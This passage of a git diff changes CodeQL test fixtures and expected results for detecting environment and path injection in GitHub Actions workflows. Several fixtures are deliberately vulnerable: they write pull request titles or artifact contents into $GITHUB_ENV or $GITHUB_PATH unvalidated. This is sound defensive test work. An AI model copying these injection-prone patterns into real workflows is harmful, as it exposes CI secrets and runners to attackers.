"$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | 
.github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | 
+| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | +| dorny/paths-filter | * | output.changes | PR changed files | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.all | PR changed files | manual | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | +| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | 
+| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | +| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | +| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | +| tj-actions/changed-files | * | output.added_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | +| tj-actions/changed-files | * 
| output.unknown_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | +| trilom/file-changes-action | * | output.files | PR changed files | manual | +| trilom/file-changes-action | * | output.files_added | PR changed files | manual | +| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | +| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | +| tzkhan/pr-update-action | * | output.headMatch | | manual | +| xt0rted/slash-command-action | * | output.command-arguments | | manual | +summaries +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * 
| input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | +| frabert/replace-string-action | * | 
input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| 
hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | 
manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | +calls +| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| 
github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $( { - return artifact.name == "oc-code-coverage" - })[0]; - let download = await github.rest.actions.downloadArtifact({ - owner: context.repo.owner, - repo: context.repo.repo, - artifact_id: matchArtifact.id, - archive_format: 'zip', - }); - let fs = require('fs'); - fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' - run: unzip oc-code-coverage.zip -d coverage - - name: set env vars - run: | - echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV - echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV - # on develop branch, only run a baseline scan - - name: SonarCloud Scan (Baseline) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD == 'develop' - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} - with: - args: > - -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.projectKey=opencost_opencost - -Dsonar.organization=opencost - -Dsonar.branch.name=develop - -Dsonar.branch.target=develop - - uses: actions/github-script@v6 - with: - script: | - print("${{enb.SONAR_PR_NUM}}") - - name: SonarCloud Scan (PR) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD != 'develop' - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} - with: - args: > - -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} - -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} - -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} - -Dsonar.projectKey=opencost_opencost - 
-Dsonar.organization=opencost diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml index 3cab86f3171..c3c94755efd 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -1,27 +1,13 @@ -name: Pull Request Open +name: Test on: pull_request_target: - branches: - - main - - 14.0.x - - types: - - opened - - reopened jobs: - updateJira: - if: github.actor != 'dependabot[bot]' + test: runs-on: ubuntu-latest steps: - - name: Checkout repository - uses: actions/checkout@v4 - - - name: Extract Jira Key + - name: Code Injection, do not report as ENV VAR INJ run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV - - name: Sink - run: echo ${{ env.ISSUE_KEY }} - diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml index e71178c4ad6..c902b7e61bd 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -1,6 +1,4 @@ -# https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0 -# https://github.com/firebase/friendlyeats-web/commit/df65aefd24cf6f092a27a5576067ff9f29aa2ef1 -name: Deploy Preview +name: Test on: workflow_run: workflows: ["Generate Preview"] @@ -8,11 +6,8 @@ on: - completed jobs: - deploy: + test: runs-on: ubuntu-latest - if: > - ${{ github.event.workflow_run.event == 'pull_request' && - github.event.workflow_run.conclusion == 'success' }} steps: - name: 'Download artifact' uses: actions/github-script@v3.1.0 
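Review bot: The expected classification of the only step in the new test1.yml is recorded solely in its `name:` string ("Code Injection, do not report as ENV VAR INJ"), with nothing saying why. A YAML comment above the `run:` line would make the fixture self-explanatory, for example `# ${{ github.event.pull_request.title }} is expanded into the script text before the shell runs, so this is a code-injection case; the >> $GITHUB_ENV write must not raise an env-var-injection alert`. With the `Sink` step removed, nothing in the file reads `env.ISSUE_KEY` any more, so the step name is the only remaining hint about what is being tested.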
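Review bot: Deleting the two reference comments at the top of test2.yml (the legitsecurity.com write-up and the friendlyeats-web fix commit) removes the only record of which real-world pattern this fixture models. The workflow is now reduced to the artifact download plus the `echo "pr_number=$(cat NR)" >> $GITHUB_ENV` step. A short header such as `# ENV VAR INJ: content of an artifact from the triggering workflow_run is written to $GITHUB_ENV unvalidated` would keep the intent readable. The first hunk of test3.yml drops its two reference comments in the same way and would benefit from the same kind of header.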
@@ -43,31 +38,6 @@ jobs: }); var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); - fs.writeFileSync('${{github.workspace}}/firestore-web.zip', Buffer.from(downloadPreview.data)); - run: | unzip pr.zip echo "pr_number=$(cat NR)" >> $GITHUB_ENV - mkdir firestore-web - unzip firestore-web.zip -d firestore-web - - name: Deploy preview - id: deploy_preview - uses: FirebaseExtended/action-hosting-deploy@v0 - with: - repoToken: '${{ secrets.GITHUB_TOKEN }}' - firebaseServiceAccount: '${{ secrets.FIREBASE_SERVICE_ACCOUNT_FIR_CODELABS_89252 }}' - projectId: fir-codelabs-89252 - entryPoint: firestore-web - channelId: firestore-web-${{ env.pr_number }} - env: - FIREBASE_CLI_PREVIEWS: hostingchannels - - name: Write Comment - uses: actions/github-script@v3 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} - script: | - await github.issues.createComment({ - owner: context.repo.owner, - repo: context.repo.repo, - issue_number: ${{ env.pr_number }}, - body: 'View preview ${{ steps.deploy_preview.outputs.details_url }}' - }); diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml index 2f76d4a3042..f76454c6088 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml @@ -1,17 +1,13 @@ -# https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project -# https://github.com/google/orbit/commit/6cd71a3f1eec098d0de61bf9bb742737cb3aa5fa -name: report-checks +name: Test on: workflow_run: workflows: ['checks'] types: - completed -permissions: read-all + jobs: - report-clang-tidy-diff: - permissions: - pull-requests: write + test: runs-on: ubuntu-latest steps: - name: Download PR metadata 
@@ -21,44 +17,7 @@ jobs: workflow_conclusion: '' name: pr_metadata if_no_artifact_found: 'ignore' - - name: Download clang_tidy_fixes - uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - workflow_conclusion: '' - name: clang_tidy_fixes - if_no_artifact_found: 'ignore' - - name: Set found_files - id: set_found_files - run: | - if [ -f clang-tidy-fixes.yml ] && [ -f pr_number.txt ] && [ -f pr_head_repo.txt ] && [ -f pr_head_ref.txt ]; then - echo "found_files=true" >> $GITHUB_OUTPUT - else - echo "found_files=false" >> $GITHUB_OUTPUT - fi - run: | echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV - if: steps.set_found_files.outputs.found_files == 'true' - - uses: actions/checkout@v3 - if: steps.set_found_files.outputs.found_files == 'true' - with: - repository: ${{ env.PR_HEAD_REPO }} - ref: ${{ env.PR_HEAD_REF }} - persist-credentials: false - - name: Redownload clang_tidy_fixes - if: steps.set_found_files.outputs.found_files == 'true' - uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - workflow_conclusion: '' - name: clang_tidy_fixes - if_no_artifact_found: 'ignore' - - uses: platisd/clang-tidy-pr-comments@89ea1b828cdac1a6ec993d225972adea3b8841b6 - if: steps.set_found_files.outputs.found_files == 'true' - with: - github_token: ${{ secrets.ORBITPROFILER_BOT_PAT }} - clang_tidy_fixes: clang-tidy-fixes.yml - pull_request_id: ${{ env.PR_NUMBER }} - diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 1e4542b6318..733b15fc956 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml 
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -1,23 +1,20 @@ -name: Pull Request Open +name: Test on: pull_request_target: - branches: - - main - - 14.0.x - - types: - - opened - - reopened jobs: - updateJira: - if: github.actor != 'dependabot[bot]' + test: runs-on: ubuntu-latest steps: - - name: Checkout repository - uses: actions/checkout@v4 - + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV - env: TITLE: ${{ github.event.pull_request.title }} run: | @@ -42,9 +39,11 @@ jobs: echo "$TITLE" >> "$GITHUB_ENV" echo EOF } >> "$GITHUB_ENV" - - run: | + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | cat <<-"EOF" >> "$GITHUB_ENV" - echo "$TITLE" + echo "FOO=$TITLE" EOF diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml new file mode 100644 index 00000000000..cfc5e6ef1fa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml 
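Review bot: The last step of test4.yml (hunk `@@ -42,9 +39,11 @@`) now receives `TITLE` from the pull request title but carries no comment saying whether it is meant to be flagged. Because the here-document delimiter is quoted (`<<-"EOF"`), the shell does not expand `$TITLE` and the literal text is appended to `$GITHUB_ENV`, so this appears to be a negative case; the .expected files in this commit list test4.yml results only up to the step at line 36, which is consistent with that. I would add a comment above the step, for example `# not a sink: the quoted "EOF" delimiter disables expansion, so $TITLE is written literally`. Without it, a later edit that drops the quotes would silently turn the fixture into a positive case.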
@@ -0,0 +1,36 @@ +name: Test +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected index 6d9801ccd81..d3b90de71e3 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected 
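Review bot: The new test5.yml fixture has no header comment saying what it models. It is a `workflow_run` job that unzips an artifact produced by the triggering run and appends the contents of `coverage/pr_num.txt`, `base.txt` and `head.txt` to `$GITHUB_ENV` without validation. A comment at the top would help the next maintainer, for example `# positive case: artifact contents from the triggering workflow reach $GITHUB_ENV unvalidated`. The suite would also benefit from a sibling step that checks the value first (for instance that the PR number is digits only) and is expected not to be reported, so that a validated write is covered as a negative case.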
@@ -1,10 +1,20 @@ edges -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:9:26:6 | Run Step | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:26:9:29:41 | Run Step | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | nodes -| .github/workflows/path1.yml:11:21:11:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | 